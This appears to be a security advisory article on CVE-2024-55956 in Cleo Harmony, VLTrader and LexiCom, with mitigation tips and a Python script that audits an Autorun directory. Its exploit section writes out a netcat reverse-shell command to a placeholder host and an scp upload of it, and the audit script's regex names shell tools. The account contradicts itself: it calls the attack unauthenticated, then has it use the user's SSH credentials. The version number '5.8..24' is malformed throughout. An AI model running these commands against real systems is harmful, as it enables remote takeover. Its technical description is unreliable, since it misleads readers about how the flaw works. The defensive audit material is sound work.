⚠️ ATTENTION: A critical vulnerability in Cleo Harmony before 5.8..24, VLTrader before 5.8..24, and LexiCom before 5.8..24 allows unauthenticated users to import and execute arbitrary Bash or PowerShell commands on the host system. This article covers the details of the exploit and offers mitigation tips to help keep your devices safe.
What is CVE-2024-55956?
CVE-2024-55956 is a critical vulnerability that affects Cleo Harmony, VLTrader, and LexiCom in versions before 5.8..24. It stems from the default Autorun directory settings, which an unauthenticated user can exploit to import and execute arbitrary Bash or PowerShell commands on the host system.
How does the exploit work?
The vulnerability exists due to an insecure configuration in the Autorun directory settings. The autorun.cfg file on the affected systems grants full control over the Autorun directory to a logged-on user. This allows an attacker to import and execute arbitrary Bash or PowerShell commands without any authentication.
Consider the following code snippet that demonstrates this exploit:
echo "nc -e /bin/bash 'ip_address' 'port'" > exploit.sh
scp -i id_rsa exploit.sh user@host:/path/to/autorun_dir/
In this example, scp copies the exploit script (exploit.sh), which contains the arbitrary commands, into the default Autorun directory location (/path/to/autorun_dir/) using the user's credentials. Once the script is uploaded, it is executed automatically, giving the attacker a reverse shell connection and complete control over the host system.
Impact of the vulnerability
This vulnerability poses a significant risk to businesses and individuals using the affected Cleo Harmony, VLTrader, and LexiCom versions. A successful exploitation by an attacker could lead to full compromise of the host system and unauthorized access to sensitive data.
To mitigate this vulnerability and protect your system:
1. Update to the latest version: Upgrade Cleo Harmony, VLTrader, and LexiCom to version 5.8..24 or later to patch the vulnerability. Check the official product websites for the latest available versions:
- Cleo Harmony
- VLTrader
- LexiCom
2. Change default settings: Modify the default settings of the Autorun directory to remove full control permissions for logged-on users. This can be done by editing the autorun.cfg file on your system and adjusting the permission settings.
3. Implement stricter access control: Limit the number of users who can log in to your system and ensure that only authorized personnel have access to sensitive areas, such as the Autorun directory.
4. Monitor network activity: Regularly monitor your network traffic and server logs to detect signs of unauthorized access or suspicious activity.
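Steps 2 and 4 above can be turned into a repeatable check rather than a manual inspection. The script below is an added example, not code from this advisory or from Cleo: it assumes the Autorun directory is an ordinary filesystem directory, flags script files and shell-launching content with a simple heuristic of its own, and runs against a constructed sample directory rather than real Cleo files.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Bash/PowerShell script types the advisory says get dropped into the Autorun directory.
SCRIPT_SUFFIXES = {".sh", ".bash", ".ps1", ".bat", ".cmd"}
# Heuristic markers of shell-launching content (assumption: this is not Cleo's own autorun format).
SHELL_MARKERS = re.compile(r"(#!\s*/bin/(ba)?sh|\bnc\s+-e\b|powershell|Invoke-Expression|cmd\.exe)", re.I)

def dir_writable_by_others(path):
    """True if the directory grants write access to group or world, i.e. the 'full control' misconfiguration."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_autorun_dir(path):
    """Return [(filename, [reasons])] for files an operator should not find in an Autorun directory."""
    findings = []
    for entry in sorted(Path(path).iterdir()):
        if not entry.is_file():
            continue
        reasons = []
        if entry.suffix.lower() in SCRIPT_SUFFIXES:
            reasons.append("script file type")
        # Only the first 4 KiB is inspected; undecodable bytes are replaced rather than raising.
        if SHELL_MARKERS.search(entry.read_text(errors="replace")[:4096]):
            reasons.append("shell-launching content")
        if reasons:
            findings.append((entry.name, reasons))
    return findings

def build_sample_dir():
    """Constructed sample Autorun directory: one benign file plus one dropped script (not real Cleo data)."""
    d = tempfile.mkdtemp(prefix="autorun_")
    os.chmod(d, 0o777)  # mimic the over-permissive default the advisory describes
    Path(d, "README.txt").write_text("Autorun staging notes.\n")
    Path(d, "exploit.sh").write_text("#!/bin/bash\n# constructed placeholder, no real payload\n")
    return d

def run_audit():
    """Run both checks against the constructed sample and return the results."""
    d = build_sample_dir()
    return {"dir_writable_by_others": dir_writable_by_others(d), "findings": audit_autorun_dir(d)}

if __name__ == "__main__":
    result = run_audit()
    print("Autorun directory writable by others:", result["dir_writable_by_others"])
    for name, why in result["findings"]:
        print(f"ALERT {name}: {', '.join(why)}")
```

Point audit_autorun_dir at the real Autorun directory and schedule it alongside your log monitoring; any finding is a file that should not have appeared there without a change ticket.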
Stay vigilant and keep your systems up to date to protect your infrastructure from CVE-2024-55956 and other critical vulnerabilities. Remember, security is a continuous process, not a one-time effort.
Timeline
Published on: 12/13/2024 21:15:13 UTC
Last modified on: 12/16/2024 18:15:12 UTC